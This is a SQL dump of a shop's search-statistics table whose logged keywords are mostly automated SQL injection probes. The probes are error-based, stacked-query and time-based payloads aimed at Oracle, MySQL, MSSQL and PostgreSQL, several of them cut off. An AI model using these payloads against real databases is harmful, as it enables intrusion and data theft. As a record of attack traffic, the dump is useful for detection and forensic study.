(2057, 1, 1, '-6181\'/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:43'),
(2058, 1, 1, '-6896\')/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:45'),
(2059, 1, 1, '-6987%\'/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:46'),
(2060, 1, 1, '-9394\'/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:48'),
(2061, 1, 1, '-4296\")/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:52'),
(2062, 1, 1, '-9940\"/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:54');
INSERT INTO `ps_statssearch` (`id_statssearch`, `id_shop`, `id_shop_group`, `keywords`, `results`, `date_add`) VALUES
(2063, 1, 1, '-1536)/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)||', 1, '2024-10-24 19:38:55'),
(2064, 1, 1, '-9204))/**/OR/**/8450=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113)|', 1, '2024-10-24 19:38:57'),
(2065, 1, 1, '-3994/**/OR/**/8450/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR', 1, '2024-10-24 19:38:59'),
(2066, 1, 1, '-5286/**/OR/**/8450/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(8450=8450)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR', 1, '2024-10-24 19:39:01'),
(2067, 1, 1, 'fJTD\')/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\'FD', 1, '2024-10-24 19:39:03'),
(2068, 1, 1, 'fJTD\'))/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/((\'', 1, '2024-10-24 19:39:05'),
(2069, 1, 1, 'fJTD\'/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'yEDF', 1, '2024-10-24 19:39:07'),
(2070, 1, 1, 'fJTD\')/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\'qe', 1, '2024-10-24 19:39:08'),
(2071, 1, 1, 'fJTD%\'/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'TTp', 1, '2024-10-24 19:39:10'),
(2072, 1, 1, 'fJTD\'/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'SuIh', 1, '2024-10-24 19:39:12'),
(2073, 1, 1, 'fJTD\")/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\"Qu', 1, '2024-10-24 19:39:14'),
(2074, 1, 1, 'fJTD\"/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\"kAIj', 1, '2024-10-24 19:39:16'),
(2075, 1, 1, 'fJTD)/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(6706', 1, '2024-10-24 19:39:17'),
(2076, 1, 1, 'fJTD))/**/AND/**/9822=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/((30', 1, '2024-10-24 19:39:19'),
(2077, 1, 1, 'fJTD/**/AND/**/9822/**/BETWEEN/**/UTL_INADDR/**/AND/**/UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||C', 1, '2024-10-24 19:39:21'),
(2078, 1, 1, 'fJTD/**/AND/**/9822/**/BETWEEN/**/UTL_INADDR/**/AND/**/UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(9822=9822)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||C', 1, '2024-10-24 19:39:23'),
(2079, 1, 1, '-8959\')/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\'aC', 1, '2024-10-24 19:39:25'),
(2080, 1, 1, '-1042\'))/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/((\'', 1, '2024-10-24 19:39:27'),
(2081, 1, 1, '-6645\'/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'EAku', 1, '2024-10-24 19:39:28'),
(2082, 1, 1, '-3536\')/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\'fX', 1, '2024-10-24 19:39:30'),
(2083, 1, 1, '-5560%\'/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'dcJ', 1, '2024-10-24 19:39:32'),
(2084, 1, 1, '-3376\'/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\'EPHE', 1, '2024-10-24 19:39:34'),
(2085, 1, 1, '-8575\")/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(\"no', 1, '2024-10-24 19:39:36'),
(2086, 1, 1, '-8817\"/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/\"PuYS', 1, '2024-10-24 19:39:38'),
(2087, 1, 1, '-2428)/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/(3643', 1, '2024-10-24 19:39:39'),
(2088, 1, 1, '-2666))/**/OR/**/5035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AND/**/((74', 1, '2024-10-24 19:39:41'),
(2089, 1, 1, '-9997/**/OR/**/5035/**/BETWEEN/**/UTL_INADDR/**/AND/**/UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||C', 1, '2024-10-24 19:39:43'),
(2090, 1, 1, '-4812/**/OR/**/5035/**/BETWEEN/**/UTL_INADDR/**/AND/**/UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)||(SELECT/**/(CASE/**/WHEN/**/(5035=5035)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)||CHR(113)||CHR(106)||CHR(113)||C', 1, '2024-10-24 19:39:44'),
(2091, 1, 1, 'fJTD\')/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/(\'rOff\'=\'rOff', 1, '2024-10-24 19:39:46'),
(2092, 1, 1, 'fJTD\'))/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/((\'XHSj\'=\'XHSj', 1, '2024-10-24 19:39:48'),
(2093, 1, 1, 'fJTD\'/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/\'KvRk\'=\'KvRk', 1, '2024-10-24 19:39:50'),
(2094, 1, 1, 'fJTD\')/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/(\'cqLM\'/**/LIKE/**/\'cqLM', 1, '2024-10-24 19:39:52'),
(2095, 1, 1, 'fJTD%\'/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/\'zVgw%\'=\'zVgw', 1, '2024-10-24 19:39:54'),
(2096, 1, 1, 'fJTD\'/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/\'RmjG\'/**/LIKE/**/\'RmjG', 1, '2024-10-24 19:39:56'),
(2097, 1, 1, 'fJTD\")/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/(\"PyKY\"=\"PyKY', 1, '2024-10-24 19:39:57'),
(2098, 1, 1, 'fJTD\"/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/\"twwl\"=\"twwl', 1, '2024-10-24 19:39:59'),
(2099, 1, 1, 'fJTD)/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/(1863/**/BETWEEN/**/1863/**/AND/**/1863', 1, '2024-10-24 19:40:05'),
(2100, 1, 1, 'fJTD))/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)/**/AND/**/((9106/**/BETWEEN/**/9106/**/AND/**/9106', 1, '2024-10-24 19:40:07'),
(2101, 1, 1, 'fJTD/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)', 1, '2024-10-24 19:40:09'),
(2102, 1, 1, 'fJTD/**/PROCEDURE/**/ANALYSE(EXTRACTVALUE(6742,CONCAT(0x5c,0x71627a7671,(SELECT/**/(CASE/**/WHEN/**/(6742=6742)/**/THEN/**/1/**/ELSE/**/0/**/END)),0x716a717a71)),1)--/**/hBiD', 1, '2024-10-24 19:40:10'),
(2103, 1, 1, '(EXTRACTVALUE(6957,CONCAT(0x5c,0x71627a7671,(SELECT/**/(ELT(6957=6957,1))),0x716a717a71)))', 0, '2024-10-24 19:40:14'),
(2104, 1, 1, '(CAST((CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113))||(SELECT/**/(CASE/**/WHEN/**/(6515=6515)/**/THEN/**/1/**/ELSE/**/0/**/END))::text||(CHR(113)||CHR(106)||CHR(113)||CHR(122)||CHR(113))/**/AS/**/NUMERIC))', 3, '2024-10-24 19:40:15'),
(2105, 1, 1, 'fJTD\');DECLARE/**/@DmUN/**/NVARCHAR(4000);SET/**/@DmUN=(SELECT/**/\'qbzvq\' (SELECT/**/(CASE/**/WHEN/**/(3033=3033)/**/THEN/**/\'1\'/**/ELSE/**/\'0\'/**/END)) \'qjqzq\');EXEC/**/@DmUN--', 1, '2024-10-24 19:40:17'),
(2106, 1, 1, 'fJTD\'));DECLARE/**/@DmUN/**/NVARCHAR(4000);SET/**/@DmUN=(SELECT/**/\'qbzvq\' (SELECT/**/(CASE/**/WHEN/**/(3033=3033)/**/THEN/**/\'1\'/**/ELSE/**/\'0\'/**/END)) \'qjqzq\');EXEC/**/@DmUN--', 1, '2024-10-24 19:40:19'),
(2107, 1, 1, 'fJTD\')/**/AND/**/SLEEP(5)/**/AND/**/(\'UgQn\'/**/LIKE/**/\'UgQn', 0, '2024-10-24 19:43:22'),
(2108, 1, 1, 'fJTD\')/**/AND/**/SLEEP(0)/**/AND/**/(\'UgQn\'/**/LIKE/**/\'UgQn', 0, '2024-10-24 19:43:24'),
(2109, 1, 1, 'fJTD\')/**/AND/**/SLEEP(5)/**/AND/**/(\'UgQn\'/**/LIKE/**/\'UgQn', 0, '2024-10-24 19:43:25'),
(2110, 1, 1, 'fJTD%\'/**/AND/**/SLEEP(5)/**/AND/**/\'ewGA%\'=\'ewGA', 0, '2024-10-24 19:43:26'),
(2111, 1, 1, 'fJTD\'/**/AND/**/SLEEP(5)/**/AND/**/\'BBLy\'/**/LIKE/**/\'BBLy', 0, '2024-10-24 19:43:28'),
(2112, 1, 1, 'fJTD\")/**/AND/**/SLEEP(5)/**/AND/**/(\"tKTI\"=\"tKTI', 0, '2024-10-24 19:43:29'),
(2113, 1, 1, 'fJTD\"/**/AND/**/SLEEP(5)/**/AND/**/\"wTSR\"=\"wTSR', 0, '2024-10-24 19:43:30'),
(2114, 1, 1, 'fJTD)/**/AND/**/SLEEP(5)/**/AND/**/(5870/**/BETWEEN/**/5870/**/AND/**/5870', 0, '2024-10-24 19:43:32'),
(2115, 1, 1, 'fJTD))/**/AND/**/SLEEP(5)/**/AND/**/((9911/**/BETWEEN/**/9911/**/AND/**/9911', 0, '2024-10-24 19:43:33'),
(2116, 1, 1, 'fJTD/**/AND/**/SLEEP(5)', 0, '2024-10-24 19:43:35'),
(2117, 1, 1, 'fJTD/**/AND/**/SLEEP(5)--/**/CiZU', 0, '2024-10-24 19:43:36'),
(2118, 1, 1, 'fJTD\')/**/OR/**/SLEEP(5)/**/AND/**/(\'PJZP\'=\'PJZP', 0, '2024-10-24 19:43:37'),
(2119, 1, 1, 'fJTD\'))/**/OR/**/SLEEP(5)/**/AND/**/((\'GvCN\'=\'GvCN', 0, '2024-10-24 19:43:39'),
(2120, 1, 1, 'fJTD\'/**/OR/**/SLEEP(5)/**/AND/**/\'vgOG\'=\'vgOG', 0, '2024-10-24 19:43:40'),
(2121, 1, 1, 'fJTD\')/**/OR/**/SLEEP(5)/**/AND/**/(\'fWyA\'/**/LIKE/**/\'fWyA', 0, '2024-10-24 19:43:41'),
(2122, 1, 1, 'fJTD%\'/**/OR/**/SLEEP(5)/**/AND/**/\'iRZc%\'=\'iRZc', 0, '2024-10-24 19:43:42'),
(2123, 1, 1, 'fJTD\'/**/OR/**/SLEEP(5)/**/AND/**/\'aBlu\'/**/LIKE/**/\'aBlu', 0, '2024-10-24 19:43:43'),
(2124, 1, 1, 'fJTD\")/**/OR/**/SLEEP(5)/**/AND/**/(\"mWGs\"=\"mWGs', 0, '2024-10-24 19:43:45'),
(2125, 1, 1, 'fJTD\"/**/OR/**/SLEEP(5)/**/AND/**/\"lvwK\"=\"lvwK', 0, '2024-10-24 19:43:46'),
(2126, 1, 1, 'fJTD)/**/OR/**/SLEEP(5)/**/AND/**/(7037/**/BETWEEN/**/7037/**/AND/**/7037', 0, '2024-10-24 19:43:48'),
(2127, 1, 1, 'fJTD))/**/OR/**/SLEEP(5)/**/AND/**/((1543/**/BETWEEN/**/1543/**/AND/**/1543', 0, '2024-10-24 19:43:50'),
(2128, 1, 1, 'fJTD/**/OR/**/SLEEP(5)', 0, '2024-10-24 19:43:51'),
(2129, 1, 1, 'fJTD/**/OR/**/SLEEP(5)--/**/cIAi', 0, '2024-10-24 19:43:54'),
(2130, 1, 1, 'fJTD\')/**/AND/**/9512=BENCHMARK(5000000,MD5(0x466b7246))/**/AND/**/(\'mRvS\'=\'mRvS', 0, '2024-10-24 19:43:55'),
(2131, 1, 1, 'fJTD))/**/AND/**/9512=BENCHMARK(5000000,MD5(0x466b7246))/**/AND/**/((3036/**/BETWEEN/**/3036/**/AND/**/3036', 0, '2024-10-24 19:44:05'),
(2132, 1, 1, 'fJTD\')/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/(\'pAWF\'/**/LIKE/**/\'pAWF', 0, '2024-10-24 19:47:49'),
(2133, 1, 1, 'fJTD\')/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/(\'pAWF\'/**/LIKE/**/\'pAWF', 0, '2024-10-24 19:47:50'),
(2134, 1, 1, 'fJTD%\'/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/\'ZYNs%\'=\'ZYNs', 0, '2024-10-24 19:47:52'),
(2135, 1, 1, 'fJTD\'/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/\'iUnS\'/**/LIKE/**/\'iUnS', 0, '2024-10-24 19:47:53'),
(2136, 1, 1, 'fJTD\")/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/(\"sIGM\"=\"sIGM', 0, '2024-10-24 19:47:54'),
(2137, 1, 1, 'fJTD\"/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/\"HEbY\"=\"HEbY', 0, '2024-10-24 19:47:56'),
(2138, 1, 1, 'fJTD)/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/(3924/**/BETWEEN/**/3924/**/AND/', 0, '2024-10-24 19:47:58'),
(2139, 1, 1, 'fJTD))/**/OR/**/4022=(SELECT/**/COUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)/**/AND/**/((1246/**/BETWEEN/**/1246/**/AN', 0, '2024-10-24 19:48:00'),
(2140, 1, 1, 'fJTD/**/OR/**/4022/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)', 0, '2024-10-24 19:48:01'),
(2141, 1, 1, 'fJTD/**/OR/**/4022/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/sysusers/**/AS/**/sys1,sysusers/**/AS/**/sys2,sysusers/**/AS/**/sys3,sysusers/**/AS/**/sys4,sysusers/**/AS/**/sys5,sysusers/**/AS/**/sys6,sysusers/**/AS/**/sys7)--/**/wENC', 0, '2024-10-24 19:48:03'),
(2142, 1, 1, 'fJTD\')/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/(\'wfEz\'=\'wfEz', 0, '2024-10-24 19:48:05'),
(2143, 1, 1, 'fJTD\'))/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/((\'yrkM\'=\'yrkM', 0, '2024-10-24 19:48:06'),
(2144, 1, 1, 'fJTD\'/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/\'fBCA\'=\'fBCA', 0, '2024-10-24 19:48:07'),
